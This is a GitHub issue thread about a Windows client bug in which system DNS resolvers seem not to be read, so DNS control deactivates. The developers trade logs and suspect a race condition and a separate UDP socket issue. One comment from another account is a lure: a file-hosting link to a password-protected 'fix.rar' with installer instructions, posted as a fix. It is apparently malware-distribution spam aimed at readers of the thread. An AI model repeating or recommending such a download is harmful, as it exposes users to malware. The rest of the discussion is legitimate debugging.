### ISSUE TITLE
bug(rust/gui-client/windows): Default system resolvers not being read

### ISSUE THREAD

**Issue by jamilbk** [CloudFire-LLC/cloudfire#6453]
On Windows, it doesn't seem like system default resolvers are being read, resulting in DNS control deactivating.

[connlib.2024-06-29-07-36-35.zip](https://github.com/user-attachments/files/16763780/connlib.2024-06-29-07-36-35.zip)

**Comment by jamilbk** [comment]
Reported by user via support@. Able to reproduce.

**Comment by ReactorScram** [comment]
No special steps to reproduce it? I installed 1.2.0 from the changelog page and I'm not seeing the error yet

It sounds familiar though. I'll do a local build of 1.2.0 and run it a few times until I see it

**Comment by jamilbk** [comment]
Hm, nope it was just install, launch, and no DNS resources were working. When I did the nslookup I noticed an IPv6 server was responding. My LAN has both IPv4/6. Could that be part of it?

User reported that many (not sure of count but maybe of handful) were all experiencing this with 1.2.0, one machine seemed to have DNS control active, but resolutions were timing out (probably a separate issue).

**Comment by ReactorScram** [comment]
I don't see the `No system default DNS servers available! Can't initialize resolver. DNS interception will be disabled.` message in that zip either

**Comment by jamilbk** [comment]
I may have attached the wrong logs. Let me see if I can fix that.

**Comment by jamilbk** [comment]
[connlib.2024-08-27-14-24-30.zip](https://github.com/user-attachments/files/16764230/connlib.2024-08-27-14-24-30.zip)

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ReactorScram** [comment]
The IPC service is supposed to call `set_dns` for itself right after starting connlib, so it shouldn't just be a bug in the IPC timing or in the GUI: https://github.com/firezone/firezone/blob/0c0cd7b5142785aac105c9c4130581673940e217/rust/headless-client/src/ipc_service.rs#L420-L424

Even if the GUI didn't have permissions to read the DNS settings or something, we should at least get the DNS resolvers that first time.

This part is strange too. We shouldn't be closing the worker thread right after accepting the 1st IPC connection. I think we're seeing some other issue and the DNS resolvers being empty are just a weird symptom.

```jsonl
{
    "time":"2024-08-27T14:24:37.8468485Z",
    "target":"firezone_bin_shared::tun_device_manager::windows",
    "logging.googleapis.com/sourceLocation":{"file":"bin-shared\\src\\tun_device_manager\\windows.rs","line":"341"},
    "severity":"INFO",
    "message":"Stopping outbound worker thread because the packet channel closed"
}
{
    "time":"2024-08-27T14:24:39.848641Z",
    "target":"firezone_headless_client::dns_control::windows",
    "logging.googleapis.com/sourceLocation":{"file":"headless-client\\src\\dns_control\\windows.rs","line":"39"},
    "severity":"INFO",
    "message":"Deactivated DNS control"
}
{
    "time":"2024-08-27T14:25:25.638417Z",
    "target":"phoenix_channel",
    "logging.googleapis.com/sourceLocation":{"file":"phoenix-channel\\src\\lib.rs","line":"362"},
    "severity":"INFO",
    "host":"api.firezone.dev",
    "message":"Connected to portal"
}
```

(Back link to internal Slack for posterity: https://firezonehq.slack.com/archives/C04HRQTFY0Z/p1724769324522299)

**Comment by jamilbk** [comment]
Now that I've digested the issue a bit more, it appears that it isn't an issue reading them, but with connlib saving them. The other clients must not hit the race condition because effectively their `Session.connect` configures the TUN interface before the first `set_dns` call. That seems to be a requirement here.

**Comment by ReactorScram** [comment]
That's strange.
I still kinda think the log messages could be a false positive that's related but not identical to the issue the customer hit

**Comment by jamilbk** [comment]
@ReactorScram I think you could be right. I don't see any indiciation of DNS issues in the logs the customer sent. Only this issue: https://github.com/firezone/firezone/issues/6454


It could be that they're hitting both issues and confusing it for the DNS race condition here.

**Comment by ReactorScram** [comment]
A `quinn-udp` socket filling up could definitely result in DNS Resources, and any Resources, not working.

Did they explicitly say DNS was broken but CIDR Resources worked?

**Comment by jamilbk** [comment]
They did, but I wouldn't consider these logs to be from a pristine test. Probably what we can do is finish this issue, https://github.com/firezone/firezone/issues/6457, and possibly #6454 fixed, then cut 1.2.1 and see if that fixes his issues.
